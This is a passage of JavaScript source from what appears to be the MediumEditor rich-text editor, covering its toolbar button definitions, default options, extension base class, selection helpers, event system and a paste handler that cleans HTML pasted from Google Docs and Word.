name: 'orderedlist',
action: 'insertorderedlist',
aria: 'ordered list',
tagNames: ['ol'],
useQueryState: true,
contentDefault: '<b>1.</b>',
contentFA: '<i class="fa fa-list-ol"></i>'
},
'unorderedlist': {
name: 'unorderedlist',
action: 'insertunorderedlist',
aria: 'unordered list',
tagNames: ['ul'],
useQueryState: true,
contentDefault: '<b>•</b>',
contentFA: '<i class="fa fa-list-ul"></i>'
},
'pre': {
name: 'pre',
action: 'append-pre',
aria: 'preformatted text',
tagNames: ['pre'],
contentDefault: '<b>0101</b>',
contentFA: '<i class="fa fa-code fa-lg"></i>'
},
'indent': {
name: 'indent',
action: 'indent',
aria: 'indent',
tagNames: [],
contentDefault: '<b>→</b>',
contentFA: '<i class="fa fa-indent"></i>'
},
'outdent': {
name: 'outdent',
action: 'outdent',
aria: 'outdent',
tagNames: [],
contentDefault: '<b>←</b>',
contentFA: '<i class="fa fa-outdent"></i>'
},
'justifyCenter': {
name: 'justifyCenter',
action: 'justifyCenter',
aria: 'center justify',
tagNames: [],
style: {
prop: 'text-align',
value: 'center'
},
contentDefault: '<b>C</b>',
contentFA: '<i class="fa fa-align-center"></i>'
},
'justifyFull': {
name: 'justifyFull',
action: 'justifyFull',
aria: 'full justify',
tagNames: [],
style: {
prop: 'text-align',
value: 'justify'
},
contentDefault: '<b>J</b>',
contentFA: '<i class="fa fa-align-justify"></i>'
},
'justifyLeft': {
name: 'justifyLeft',
action: 'justifyLeft',
aria: 'left justify',
tagNames: [],
style: {
prop: 'text-align',
value: 'left'
},
contentDefault: '<b>L</b>',
contentFA: '<i class="fa fa-align-left"></i>'
},
'justifyRight': {
name: 'justifyRight',
action: 'justifyRight',
aria: 'right justify',
tagNames: [],
style: {
prop: 'text-align',
value: 'right'
},
contentDefault: '<b>R</b>',
contentFA: '<i class="fa fa-align-right"></i>'
},
'header1': {
name: 'header1',
action: function (options) {
return 'append-' + options.firstHeader;
},
aria: function (options) {
return options.firstHeader;
},
tagNames: function (options) {
return [options.firstHeader];
},
contentDefault: '<b>H1</b>'
},
'header2': {
name: 'header2',
action: function (options) {
return 'append-' + options.secondHeader;
},
aria: function (options) {
return options.secondHeader;
},
tagNames: function (options) {
return [options.secondHeader];
},
contentDefault: '<b>H2</b>'
},
// Known inline elements that are not removed, or not removed consistently across browsers:
// <span>, <label>, <br>
'removeFormat': {
name: 'removeFormat',
aria: 'remove formatting',
action: 'removeFormat',
contentDefault: '<b>X</b>',
contentFA: '<i class="fa fa-eraser"></i>'
}
};
})();
var editorDefaults;
(function () {
// summary: The default options hash used by the Editor
editorDefaults = {
allowMultiParagraphSelection: true,
anchorInputPlaceholder: 'Paste or type a link',
anchorInputCheckboxLabel: 'Open in new window',
anchorPreviewHideDelay: 500,
buttons: ['bold', 'italic', 'underline', 'anchor', 'header1', 'header2', 'quote'],
buttonLabels: false,
checkLinkFormat: false,
delay: 0,
diffLeft: 0,
diffTop: -10,
disableReturn: false,
disableDoubleReturn: false,
disableToolbar: false,
disableAnchorPreview: false,
disableEditing: false,
disablePlaceholders: false,
toolbarAlign: 'center',
elementsContainer: false,
imageDragging: true,
standardizeSelectionStart: false,
contentWindow: window,
ownerDocument: document,
firstHeader: 'h3',
placeholder: 'Type your text',
secondHeader: 'h4',
targetBlank: false,
anchorTarget: false,
anchorButton: false,
anchorButtonClass: 'btn',
extensions: {},
activeButtonClass: 'medium-editor-button-active',
firstButtonClass: 'medium-editor-button-first',
lastButtonClass: 'medium-editor-button-last',
spellcheck: true,
paste: {
forcePlainText: true,
cleanPastedHTML: false,
cleanAttrs: ['class', 'style', 'dir'],
cleanTags: ['meta']
}
};
})();
var Extension;
(function () {
Extension = function (options) {
Util.extend(this, options);
};
Extension.extend = function (protoProps) {
// magic extender thinger. mostly borrowed from backbone/goog.inherits
// place this function on some thing you want extend-able.
//
// example:
//
// function Thing(args){
// this.options = args;
// }
//
// Thing.prototype = { foo: "bar" };
// Thing.extend = extenderify;
//
// var ThingTwo = Thing.extend({ foo: "baz" });
//
// var thingOne = new Thing(); // foo === bar
// var thingTwo = new ThingTwo(); // foo == baz
//
// which seems like some simply shallow copy nonsense
// at first, but a lot more is going on there.
//
// passing a `constructor` to the extend props
// will cause the instance to instantiate through that
// instead of the parent's constructor.
var parent = this,
child;
// The constructor function for the new subclass is either defined by you
// (the "constructor" property in your `extend` definition), or defaulted
// by us to simply call the parent's constructor.
if (protoProps && protoProps.hasOwnProperty('constructor')) {
child = protoProps.constructor;
} else {
child = function () {
return parent.apply(this, arguments);
};
}
// das statics (.extend comes over, so your subclass can have subclasses too)
Util.extend(child, parent);
// Set the prototype chain to inherit from `parent`, without calling
// `parent`'s constructor function.
var Surrogate = function () {
this.constructor = child;
};
Surrogate.prototype = parent.prototype;
child.prototype = new Surrogate();
if (protoProps) {
Util.extend(child.prototype, protoProps);
}
// todo: $super?
return child;
};
Extension.prototype = {
init: function (/* instance */) {
// called when properly decorated and used.
// has a .base value pointing to the editor
// owning us. has been given a .name if no
// name present
},
/* parent: [boolean]
*
* setting this to true will set the .base property
* of the extension to be a reference to the
* medium-editor instance that is using the extension
*/
parent: false,
/* base: [MediumEditor instance]
*
* If .parent is set to true, this will be set to the
* current MediumEditor instance before init() is called
*/
base: null,
/* name: [string]
*
* 'name' of the extension, used for retrieving the extension.
* If not set, MediumEditor will set this to be the key
* used when passing the extension into MediumEditor via the
* 'extensions' option
*/
name: null,
/* checkState: [function (node)]
*
* If implemented, this function will be called one or more times
* the state of the editor & toolbar are updated.
* When the state is updated, the editor does the following:
*
* 1) Find the parent node containing the current selection
* 2) Call checkState on the extension, passing the node as an argument
* 3) Get the parent node of the previous node
* 4) Repeat steps #2 and #3 until we move outside the parent contenteditable
*/
checkState: null,
/* getButton: [function ()]
*
* If implemented, this function will be called when
* the toolbar is being created. The DOM Element returned
* by this function will be appended to the toolbar along
* with any other buttons.
*/
getButton: null,
/* As alternatives to checkState, these functions provide a more structured
* path to updating the state of an extension (usually a button) whenever
* the state of the editor & toolbar are updated.
*/
/* queryCommandState: [function ()]
*
* If implemented, this function will be called once on each extension
* when the state of the editor/toolbar is being updated.
*
* If this function returns a non-null value, the extension will
* be ignored as the code climbs the dom tree.
*
* If this function returns true, and the setActive() function is defined
* setActive() will be called
*/
queryCommandState: null,
/* isActive: [function ()]
*
* If implemented, this function will be called when MediumEditor
* has determined that this extension is 'active' for the current selection.
* This may be called when the editor & toolbar are being updated,
* but only if queryCommandState() or isAlreadyApplied() functions
* are implemented, and when called, return true.
*/
isActive: null,
/* isAlreadyApplied: [function (node)]
*
* If implemented, this function is similar to checkState() in
* that it will be called repeatedly as MediumEditor moves up
* the DOM to update the editor & toolbar after a state change.
*
* NOTE: This function will NOT be called if checkState() has
* been implemented. This function will NOT be called if
* queryCommandState() is implemented and returns a non-null
* value when called
*/
isAlreadyApplied: null,
/* setActive: [function ()]
*
* If implemented, this function is called when MediumEditor knows
* that this extension is currently enabled. Currently, this
* function is called when updating the editor & toolbar, and
* only if queryCommandState() or isAlreadyApplied(node) return
* true when called
*/
setActive: null,
/* setInactive: [function ()]
*
* If implemented, this function is called when MediumEditor knows
* that this extension is currently disabled. Currently, this
* is called at the beginning of each state change for
* the editor & toolbar. After calling this, MediumEditor
* will attempt to update the extension, either via checkState()
* or the combination of queryCommandState(), isAlreadyApplied(node),
* isActive(), and setActive()
*/
setInactive: null,
/* onHide: [function ()]
*
* If implemented, this function is called each time the
* toolbar is hidden
*/
onHide: null
};
})();
var Selection;
(function () {
'use strict';
Selection = {
findMatchingSelectionParent: function (testElementFunction, contentWindow) {
var selection = contentWindow.getSelection(),
range,
current;
if (selection.rangeCount === 0) {
return false;
}
range = selection.getRangeAt(0);
current = range.commonAncestorContainer;
return Util.traverseUp(current, testElementFunction);
},
getSelectionElement: function (contentWindow) {
return this.findMatchingSelectionParent(function (el) {
return el.getAttribute('data-medium-element');
}, contentWindow);
},
selectionInContentEditableFalse: function (contentWindow) {
return this.findMatchingSelectionParent(function (el) {
return (el && el.nodeName !== '#text' && el.getAttribute('contenteditable') === 'false');
}, contentWindow);
},
// http://stackoverflow.com/questions/4176923/html-of-selected-text
// by Tim Down
getSelectionHtml: function getSelectionHtml() {
var i,
html = '',
sel = this.options.contentWindow.getSelection(),
len,
container;
if (sel.rangeCount) {
container = this.options.ownerDocument.createElement('div');
for (i = 0, len = sel.rangeCount; i < len; i += 1) {
container.appendChild(sel.getRangeAt(i).cloneContents());
}
html = container.innerHTML;
}
return html;
},
/**
* Find the caret position within an element irrespective of any inline tags it may contain.
*
* @param {DOMElement} element An element containing the cursor to find offsets relative to.
* @param {Range} range A Range representing the cursor position. Will use window.getSelection if none is passed.
* @return {Object} 'left' and 'right' attributes contain offsets from the beginning and end of the element
*/
getCaretOffsets: function getCaretOffsets(element, range) {
var preCaretRange, postCaretRange;
if (!range) {
range = window.getSelection().getRangeAt(0);
}
preCaretRange = range.cloneRange();
postCaretRange = range.cloneRange();
preCaretRange.selectNodeContents(element);
preCaretRange.setEnd(range.endContainer, range.endOffset);
postCaretRange.selectNodeContents(element);
postCaretRange.setStart(range.endContainer, range.endOffset);
return {
left: preCaretRange.toString().length,
right: postCaretRange.toString().length
};
},
// http://stackoverflow.com/questions/15867542/range-object-get-selection-parent-node-chrome-vs-firefox
rangeSelectsSingleNode: function (range) {
var startNode = range.startContainer;
return startNode === range.endContainer &&
startNode.hasChildNodes() &&
range.endOffset === range.startOffset + 1;
},
getSelectedParentElement: function (range) {
var selectedParentElement = null;
if (this.rangeSelectsSingleNode(range) && range.startContainer.childNodes[range.startOffset].nodeType !== 3) {
selectedParentElement = range.startContainer.childNodes[range.startOffset];
} else if (range.startContainer.nodeType === 3) {
selectedParentElement = range.startContainer.parentNode;
} else {
selectedParentElement = range.startContainer;
}
return selectedParentElement;
},
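// Collects the elements covered by the current selection; when the selection
// sits inside a single text node, walks up through sole-child ancestors
// instead.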
getSelectedElements: function (doc) {
var selection = doc.getSelection(),
range,
toRet,
currNode;
if (!selection.rangeCount ||
!selection.getRangeAt(0).commonAncestorContainer) {
return [];
}
range = selection.getRangeAt(0);
if (range.commonAncestorContainer.nodeType === 3) {
toRet = [];
currNode = range.commonAncestorContainer;
while (currNode.parentNode && currNode.parentNode.childNodes.length === 1) {
toRet.push(currNode.parentNode);
currNode = currNode.parentNode;
}
return toRet;
}
return [].filter.call(range.commonAncestorContainer.getElementsByTagName('*'), function (el) {
return (typeof selection.containsNode === 'function') ? selection.containsNode(el, true) : true;
});
},
selectNode: function (node, doc) {
var range = doc.createRange(),
sel = doc.getSelection();
range.selectNodeContents(node);
sel.removeAllRanges();
sel.addRange(range);
}
};
}());
var Events;
(function () {
'use strict';
Events = function (instance) {
this.base = instance;
this.options = this.base.options;
this.events = [];
this.customEvents = {};
this.listeners = {};
};
Events.prototype = {
// Helpers for event handling
attachDOMEvent: function (target, event, listener, useCapture) {
target.addEventListener(event, listener, useCapture);
this.events.push([target, event, listener, useCapture]);
},
detachDOMEvent: function (target, event, listener, useCapture) {
var index = this.indexOfListener(target, event, listener, useCapture),
e;
if (index !== -1) {
e = this.events.splice(index, 1)[0];
e[0].removeEventListener(e[1], e[2], e[3]);
}
},
indexOfListener: function (target, event, listener, useCapture) {
var i, n, item;
for (i = 0, n = this.events.length; i < n; i = i + 1) {
item = this.events[i];
if (item[0] === target && item[1] === event && item[2] === listener && item[3] === useCapture) {
return i;
}
}
return -1;
},
detachAllDOMEvents: function () {
var e = this.events.pop();
while (e) {
e[0].removeEventListener(e[1], e[2], e[3]);
e = this.events.pop();
}
},
// custom events
attachCustomEvent: function (event, listener) {
this.setupListener(event);
// If we don't support this custom event, don't do anything
if (this.listeners[event]) {
if (!this.customEvents[event]) {
this.customEvents[event] = [];
}
this.customEvents[event].push(listener);
}
},
detachCustomEvent: function (event, listener) {
var index = this.indexOfCustomListener(event, listener);
if (index !== -1) {
this.customEvents[event].splice(index, 1);
// TODO: If array is empty, should detach internal listeners via destroyListener()
}
},
indexOfCustomListener: function (event, listener) {
if (!this.customEvents[event] || !this.customEvents[event].length) {
return -1;
}
return this.customEvents[event].indexOf(listener);
},
detachAllCustomEvents: function () {
this.customEvents = {};
// TODO: Should detach internal listeners here via destroyListener()
},
triggerCustomEvent: function (name, data, editable) {
if (this.customEvents[name]) {
this.customEvents[name].forEach(function (listener) {
listener(data, editable);
});
}
},
// Listening to browser events to emit events medium-editor cares about
setupListener: function (name) {
if (this.listeners[name]) {
return;
}
switch (name) {
case 'externalInteraction':
// Detecting when user has interacted with elements outside of MediumEditor
this.attachDOMEvent(this.options.ownerDocument.body, 'mousedown', this.handleBodyMousedown.bind(this), true);
this.attachDOMEvent(this.options.ownerDocument.body, 'click', this.handleBodyClick.bind(this), true);
this.attachDOMEvent(this.options.ownerDocument.body, 'focus', this.handleBodyFocus.bind(this), true);
this.listeners[name] = true;
break;
case 'blur':
// Detecting when focus is lost
this.setupListener('externalInteraction');
this.listeners[name] = true;
break;
case 'focus':
// Detecting when focus moves into some part of MediumEditor
this.setupListener('externalInteraction');
this.listeners[name] = true;
break;
case 'editableClick':
// Detecting click in the contenteditables
this.base.elements.forEach(function (element) {
this.attachDOMEvent(element, 'click', this.handleClick.bind(this));
}.bind(this));
this.listeners[name] = true;
break;
case 'editableBlur':
// Detecting blur in the contenteditables
this.base.elements.forEach(function (element) {
this.attachDOMEvent(element, 'blur', this.handleBlur.bind(this));
}.bind(this));
this.listeners[name] = true;
break;
case 'editableKeypress':
// Detecting keypress in the contenteditables
this.base.elements.forEach(function (element) {
this.attachDOMEvent(element, 'keypress', this.handleKeypress.bind(this));
}.bind(this));
this.listeners[name] = true;
break;
case 'editableKeyup':
// Detecting keyup in the contenteditables
this.base.elements.forEach(function (element) {
this.attachDOMEvent(element, 'keyup', this.handleKeyup.bind(this));
}.bind(this));
this.listeners[name] = true;
break;
case 'editableKeydown':
// Detecting keydown on the contenteditables
this.base.elements.forEach(function (element) {
this.attachDOMEvent(element, 'keydown', this.handleKeydown.bind(this));
}.bind(this));
this.listeners[name] = true;
break;
case 'editableKeydownEnter':
// Detecting keydown for ENTER on the contenteditables
this.setupListener('editableKeydown');
this.listeners[name] = true;
break;
case 'editableKeydownTab':
// Detecting keydown for TAB on the contenteditable
this.setupListener('editableKeydown');
this.listeners[name] = true;
break;
case 'editableKeydownDelete':
// Detecting keydown for DELETE/BACKSPACE on the contenteditables
this.setupListener('editableKeydown');
this.listeners[name] = true;
break;
case 'editableMouseover':
// Detecting mouseover on the contenteditables
this.base.elements.forEach(function (element) {
this.attachDOMEvent(element, 'mouseover', this.handleMouseover.bind(this));
}, this);
this.listeners[name] = true;
break;
case 'editableDrag':
// Detecting dragover and dragleave on the contenteditables
this.base.elements.forEach(function (element) {
this.attachDOMEvent(element, 'dragover', this.handleDragging.bind(this));
this.attachDOMEvent(element, 'dragleave', this.handleDragging.bind(this));
}, this);
this.listeners[name] = true;
break;
case 'editableDrop':
// Detecting drop on the contenteditables
this.base.elements.forEach(function (element) {
this.attachDOMEvent(element, 'drop', this.handleDrop.bind(this));
}, this);
this.listeners[name] = true;
break;
case 'editablePaste':
// Detecting paste on the contenteditables
this.base.elements.forEach(function (element) {
this.attachDOMEvent(element, 'paste', this.handlePaste.bind(this));
}, this);
this.listeners[name] = true;
break;
}
},
focusElement: function (element) {
element.focus();
this.updateFocus(element, { target: element, type: 'focus' });
},
updateFocus: function (target, eventObj) {
var toolbarEl = this.base.toolbar ? this.base.toolbar.getToolbarElement() : null,
anchorPreview = this.base.getExtensionByName('anchor-preview'),
previewEl = (anchorPreview && anchorPreview.getPreviewElement) ? anchorPreview.getPreviewElement() : null,
hadFocus,
toFocus;
this.base.elements.some(function (element) {
// Find the element that has focus
if (!hadFocus && element.getAttribute('data-medium-focused')) {
hadFocus = element;
}
// bail if we found the element that had focus
return !!hadFocus;
}, this);
// For clicks, we need to know if the mousedown that caused the click happened inside the existing focused element.
// If so, we don't want to focus another element
if (hadFocus &&
eventObj.type === 'click' &&
this.lastMousedownTarget &&
(Util.isDescendant(hadFocus, this.lastMousedownTarget, true) ||
Util.isDescendant(toolbarEl, this.lastMousedownTarget, true) ||
Util.isDescendant(previewEl, this.lastMousedownTarget, true))) {
toFocus = hadFocus;
}
if (!toFocus) {
this.base.elements.some(function (element) {
// If the target is part of an editor element, this is the element getting focus
if (!toFocus && (Util.isDescendant(element, target, true))) {
toFocus = element;
}
// bail if we found an element that's getting focus
return !!toFocus;
}, this);
}
// Check if the target is external (not part of the editor, toolbar, or anchorpreview)
var externalEvent = !Util.isDescendant(hadFocus, target, true) &&
!Util.isDescendant(toolbarEl, target, true) &&
!Util.isDescendant(previewEl, target, true);
if (toFocus !== hadFocus) {
// If element has focus, and focus is going outside of editor
// Don't blur focused element if clicking on editor, toolbar, or anchorpreview
if (hadFocus && externalEvent) {
// Trigger blur on the editable that has lost focus
hadFocus.removeAttribute('data-medium-focused');
this.triggerCustomEvent('blur', eventObj, hadFocus);
}
// If focus is going into an editor element
if (toFocus) {
// Trigger focus on the editable that now has focus
toFocus.setAttribute('data-medium-focused', true);
this.triggerCustomEvent('focus', eventObj, toFocus);
}
}
if (externalEvent) {
this.triggerCustomEvent('externalInteraction', eventObj);
}
},
handleBodyClick: function (event) {
this.updateFocus(event.target, event);
},
handleBodyFocus: function (event) {
this.updateFocus(event.target, event);
},
handleBodyMousedown: function (event) {
this.lastMousedownTarget = event.target;
},
handleClick: function (event) {
this.triggerCustomEvent('editableClick', event, event.currentTarget);
},
handleBlur: function (event) {
this.triggerCustomEvent('editableBlur', event, event.currentTarget);
},
handleKeypress: function (event) {
this.triggerCustomEvent('editableKeypress', event, event.currentTarget);
},
handleKeyup: function (event) {
this.triggerCustomEvent('editableKeyup', event, event.currentTarget);
},
handleMouseover: function (event) {
this.triggerCustomEvent('editableMouseover', event, event.currentTarget);
},
handleDragging: function (event) {
this.triggerCustomEvent('editableDrag', event, event.currentTarget);
},
handleDrop: function (event) {
this.triggerCustomEvent('editableDrop', event, event.currentTarget);
},
handlePaste: function (event) {
this.triggerCustomEvent('editablePaste', event, event.currentTarget);
},
handleKeydown: function (event) {
this.triggerCustomEvent('editableKeydown', event, event.currentTarget);
switch (event.which) {
case Util.keyCode.ENTER:
this.triggerCustomEvent('editableKeydownEnter', event, event.currentTarget);
break;
case Util.keyCode.TAB:
this.triggerCustomEvent('editableKeydownTab', event, event.currentTarget);
break;
case Util.keyCode.DELETE:
case Util.keyCode.BACKSPACE:
this.triggerCustomEvent('editableKeydownDelete', event, event.currentTarget);
break;
}
}
};
}());
var DefaultButton;
(function () {
'use strict';
DefaultButton = function (options, instance) {
this.options = options;
this.name = options.name;
this.init(instance);
};
DefaultButton.prototype = {
init: function (instance) {
this.base = instance;
this.button = this.createButton();
this.base.on(this.button, 'click', this.handleClick.bind(this));
if (this.options.key) {
this.base.subscribe('editableKeydown', this.handleKeydown.bind(this));
}
},
getButton: function () {
return this.button;
},
getAction: function () {
return (typeof this.options.action === 'function') ? this.options.action(this.base.options) : this.options.action;
},
getAria: function () {
return (typeof this.options.aria === 'function') ? this.options.aria(this.base.options) : this.options.aria;
},
getTagNames: function () {
return (typeof this.options.tagNames === 'function') ? this.options.tagNames(this.base.options) : this.options.tagNames;
},
createButton: function () {
var button = this.base.options.ownerDocument.createElement('button'),
content = this.options.contentDefault,
ariaLabel = this.getAria();
button.classList.add('medium-editor-action');
button.classList.add('medium-editor-action-' + this.name);
button.setAttribute('data-action', this.getAction());
if (ariaLabel) {
button.setAttribute('title', ariaLabel);
button.setAttribute('aria-label', ariaLabel);
}
if (this.base.options.buttonLabels) {
if (this.base.options.buttonLabels === 'fontawesome' && this.options.contentFA) {
content = this.options.contentFA;
} else if (typeof this.base.options.buttonLabels === 'object' && this.base.options.buttonLabels[this.name]) {
content = this.base.options.buttonLabels[this.options.name];
}
}
button.innerHTML = content;
return button;
},
handleKeydown: function (evt) {
var key, action;
if (evt.ctrlKey || evt.metaKey) {
key = String.fromCharCode(evt.which || evt.keyCode).toLowerCase();
if (this.options.key === key) {
evt.preventDefault();
evt.stopPropagation();
action = this.getAction();
if (action) {
this.base.execAction(action);
}
}
}
},
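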
handleClick: function (evt) {
evt.preventDefault();
evt.stopPropagation();
var action = this.getAction();
if (action) {
this.base.execAction(action);
}
},
isActive: function () {
return this.button.classList.contains(this.base.options.activeButtonClass);
},
setInactive: function () {
this.button.classList.remove(this.base.options.activeButtonClass);
delete this.knownState;
},
setActive: function () {
this.button.classList.add(this.base.options.activeButtonClass);
delete this.knownState;
},
queryCommandState: function () {
var queryState = null;
if (this.options.useQueryState) {
queryState = this.base.queryCommandState(this.getAction());
}
return queryState;
},
isAlreadyApplied: function (node) {
var isMatch = false,
tagNames = this.getTagNames(),
styleVals,
computedStyle;
if (this.knownState === false || this.knownState === true) {
return this.knownState;
}
if (tagNames && tagNames.length > 0 && node.tagName) {
isMatch = tagNames.indexOf(node.tagName.toLowerCase()) !== -1;
}
if (!isMatch && this.options.style) {
styleVals = this.options.style.value.split('|');
computedStyle = this.base.options.contentWindow.getComputedStyle(node, null).getPropertyValue(this.options.style.prop);
styleVals.forEach(function (val) {
if (!this.knownState) {
isMatch = (computedStyle.indexOf(val) !== -1);
// text-decoration is not inherited by default
// so if the computed style for text-decoration doesn't match
// don't write to knownState so we can fall back to other checks
if (isMatch || this.options.style.prop !== 'text-decoration') {
this.knownState = isMatch;
}
}
}, this);
}
return isMatch;
}
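// Illustrative: for style-based checks the configured value is split on '|',
// so a button configured with style {prop: 'font-weight', value: '700|bold'}
// (an assumed example) counts as applied when the node's computed
// 'font-weight' contains either '700' or 'bold'.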
};
}());
var PasteHandler;
(function () {
'use strict';
/*jslint regexp: true*/
/*
jslint does not allow character negation, because the negation
will not match any unicode characters. In the regexes in this
block, negation is used specifically to match the end of an html
tag, and in fact unicode characters *should* be allowed.
*/
function createReplacements() {
return [
// replace two bogus tags that begin pastes from google docs
[new RegExp(/<[^>]*docs-internal-guid[^>]*>/gi), ''],
[new RegExp(/<\/b>(<br[^>]*>)?$/gi), ''],
// un-html spaces and newlines inserted by OS X
[new RegExp(/<span class="Apple-converted-space">\s+<\/span>/g), ' '],
[new RegExp(/<br class="Apple-interchange-newline">/g), '<br>'],
// replace google docs italics+bold with a span to be replaced once the html is inserted
[new RegExp(/<span[^>]*(font-style:italic;font-weight:bold|font-weight:bold;font-style:italic)[^>]*>/gi), '<span class="replace-with italic bold">'],
// replace google docs italics with a span to be replaced once the html is inserted
[new RegExp(/<span[^>]*font-style:italic[^>]*>/gi), '<span class="replace-with italic">'],
// replace google docs bolds with a span to be replaced once the html is inserted
[new RegExp(/<span[^>]*font-weight:bold[^>]*>/gi), '<span class="replace-with bold">'],
// replace manually entered b/i/a tags with real ones
[new RegExp(/<(\/?)(i|b|a)>/gi), '<$1$2>'],
// replace manually entered a tags with real ones, converting smart-quotes from google docs
[new RegExp(/<a(?:(?!href).)+href=(?:"|”|“|&quot;|&ldquo;|&rdquo;)(((?!"|”|“|&quot;|&ldquo;|&rdquo;).)*)(?:"|”|“|&quot;|&ldquo;|&rdquo;)(?:(?!>).)*>/gi), '<a href="$1">'],
// Newlines between paragraphs in html have no syntactic value,
// but they have a tendency to accidentally become additional paragraphs down the line
[new RegExp(/<\/p>\n+/gi), '</p>'],
[new RegExp(/\n+<p/gi), '<p'],
// Microsoft Word makes these odd tags, like <o:p></o:p>
[new RegExp(/<\/?o:[a-z]*>/gi), '']
];
}
/*jslint regexp: false*/
PasteHandler = Extension.extend({
/* Paste Options */
/* forcePlainText: [boolean]
* Forces pasting as plain text.
*/
forcePlainText: true,
/* cleanPastedHTML: [boolean]
* cleans pasted content from different sources, like google docs etc.
*/
cleanPastedHTML: false,
/* cleanReplacements: [Array]
* custom pairs (2 element arrays) of RegExp and replacement text to use during paste when
* __forcePlainText__ or __cleanPastedHTML__ are `true` OR when calling `cleanPaste(text)` helper method.
*/
cleanReplacements: [],
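/* Illustrative custom pair (assumed, not shipped with the editor):
 * cleanReplacements: [
 * [new RegExp(/<span[^>]*mso-[^>]*>/gi), '<span>']
 * ]
 * Each pair is applied via text.replace(pair[0], pair[1]) in cleanPaste below.
 */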
/* cleanAttrs: [Array]
* list of element attributes to remove during paste when __cleanPastedHTML__ is `true` or when
* calling `cleanPaste(text)` or `pasteHTML(html, options)` helper methods.
*/
cleanAttrs: ['class', 'style', 'dir'],
/* cleanTags: [Array]
* list of element tag names to remove during paste when __cleanPastedHTML__ is `true` or when
* calling `cleanPaste(text)` or `pasteHTML(html, options)` helper methods.
*/
cleanTags: ['meta'],
/* ----- internal options needed from base ----- */
'window': window,
'document': document,
targetBlank: false,
disableReturn: false,
// Need a reference to MediumEditor (this.base)
parent: true,
init: function () {
if (this.forcePlainText || this.cleanPastedHTML) {
this.base.subscribe('editablePaste', this.handlePaste.bind(this));
}
},
handlePaste: function (event, element) {
var paragraphs,
html = '',
p,
dataFormatHTML = 'text/html',
dataFormatPlain = 'text/plain',
pastedHTML,
pastedPlain;
if (this.window.clipboardData && event.clipboardData === undefined) {
event.clipboardData = this.window.clipboardData;
// If window.clipboardData exists, but event.clipboardData doesn't exist,
// we're probably in IE. IE only has two possibilities for clipboard
// data format: 'Text' and 'URL'.
//
// Of the two, we want 'Text':
dataFormatHTML = 'Text';
dataFormatPlain = 'Text';
}
if (event.clipboardData &&
event.clipboardData.getData &&
!event.defaultPrevented) {
event.preventDefault();
pastedHTML = event.clipboardData.getData(dataFormatHTML);
pastedPlain = event.clipboardData.getData(dataFormatPlain);
if (!pastedHTML) {
pastedHTML = pastedPlain;
}
if (this.cleanPastedHTML && pastedHTML) {
return this.cleanPaste(pastedHTML);
}
if (!(this.disableReturn || element.getAttribute('data-disable-return'))) {
paragraphs = pastedPlain.split(/[\r\n]+/g);
// If there are no \r\n in data, don't wrap in <p>
if (paragraphs.length > 1) {
for (p = 0; p < paragraphs.length; p += 1) {
if (paragraphs[p] !== '') {
html += '<p>' + Util.htmlEntities(paragraphs[p]) + '</p>';
}
}
} else {
html = Util.htmlEntities(paragraphs[0]);
}
} else {
html = Util.htmlEntities(pastedPlain);
}
Util.insertHTMLCommand(this.document, html);
}
},
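// Illustrative: with return enabled, pasting the plain text "foo\r\nbar"
// inserts '<p>foo</p><p>bar</p>', while a single line "foo" is inserted
// unwrapped (both after Util.htmlEntities escaping).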
cleanPaste: function (text) {
var i, elList, workEl,
el = Selection.getSelectionElement(this.window),
multiline = /<p|<br|<div/.test(text),
replacements = createReplacements().concat(this.cleanReplacements || []);
for (i = 0; i < replacements.length; i += 1) {
text = text.replace(replacements[i][0], replacements[i][1]);
}
if (multiline) {
// double br's aren't converted to p tags, but we want paragraphs.
elList = text.split('<br><br>');
this.pasteHTML('<p>' + elList.join('</p><p>') + '</p>');
try {
this.document.execCommand('insertText', false, '\n');
} catch (ignore) { }
// block element cleanup
elList = el.querySelectorAll('a,p,div,br');
for (i = 0; i < elList.length; i += 1) {
workEl = elList[i];
// Microsoft Word replaces some spaces with newlines.
// While newlines between block elements are meaningless, newlines within
// elements are sometimes actually spaces.
workEl.innerHTML = workEl.innerHTML.replace(/\n/gi, ' ');
switch (workEl.tagName.toLowerCase()) {
case 'a':
if (this.targetBlank) {
Util.setTargetBlank(workEl);
}
break;
case 'p':
case 'div':
this.filterCommonBlocks(workEl);
break;
case 'br':
this.filterLineBreak(workEl);
break;
}
}
} else {
this.pasteHTML(text);
}
},
pasteHTML: function (html, options) {
options = Util.defaults({}, options, {
cleanAttrs: this.cleanAttrs,
cleanTags: this.cleanTags
});
var elList, workEl, i, fragmentBody, pasteBlock = this.document.createDocumentFragment();
pasteBlock.appendChild(this.document.createElement('body'));
fragmentBody = pasteBlock.querySelector('body');
fragmentBody.innerHTML = html;
this.cleanupSpans(fragmentBody);
elList = fragmentBody.querySelectorAll('*');
for (i = 0; i < elList.length; i += 1) {
workEl = elList[i];
Util.cleanupAttrs(workEl, options.cleanAttrs);
Util.cleanupTags(workEl, options.cleanTags);
}
Util.insertHTMLCommand(this.document, fragmentBody.innerHTML.replace(/&nbsp;/g, ' '));
},
isCommonBlock: function (el) {
return (el && (el.tagName.toLowerCase() === 'p' || el.tagName.toLowerCase() === 'div'));
},
filterCommonBlocks: function (el) {
if (/^\s*$/.test(el.textContent) && el.parentNode) {
el.parentNode.removeChild(el);
}
},
filterLineBreak: function (el) {
if (this.isCommonBlock(el.previousElementSibling)) {
// remove stray br's following common block elements
this.removeWithParent(el);
} else if (this.isCommonBlock(el.parentNode) && (el.parentNode.firstChild === el || el.parentNode.lastChild === el)) {
// remove br's just inside open or close tags of a div/p
this.removeWithParent(el);
} else if (el.parentNode && el.parentNode.childElementCount === 1 && el.parentNode.textContent === '') {
// and br's that are the only child of elements other than div/p
this.removeWithParent(el);
}
},
// remove an element, including its parent, if it is the only element within its parent
removeWithParent: function (el) {
if (el && el.parentNode) {
if (el.parentNode.parentNode && el.parentNode.childElementCount === 1) {
el.parentNode.parentNode.removeChild(el.parentNode);
} else {
el.parentNode.removeChild(el);
}
}
},
cleanupSpans: function (containerEl) {
var i,
el,
newEl,
spans = containerEl.querySelectorAll('.replace-with'),
isCEF = function (el) {
return (el && el.nodeName !== '#text' && el.getAttribute('contenteditable') === 'false');
};
for (i = 0; i < spans.length; i += 1) {
el = spans[i];
newEl = this.document.createElement(el.classList.contains('bold') ? 'b' : 'i');
if (el.classList.contains('bold') && el.classList.contains('italic')) {
// add an i tag as well if this has both italics and bold
newEl.innerHTML = '<i>' + el.innerHTML + '</i>';
} else {
newEl.innerHTML = el.innerHTML;
}
el.parentNode.replaceChild(newEl, el);
}
spans = containerEl.querySelectorAll('span');
for (i = 0; i < spans.length; i += 1) {
el = spans[i];
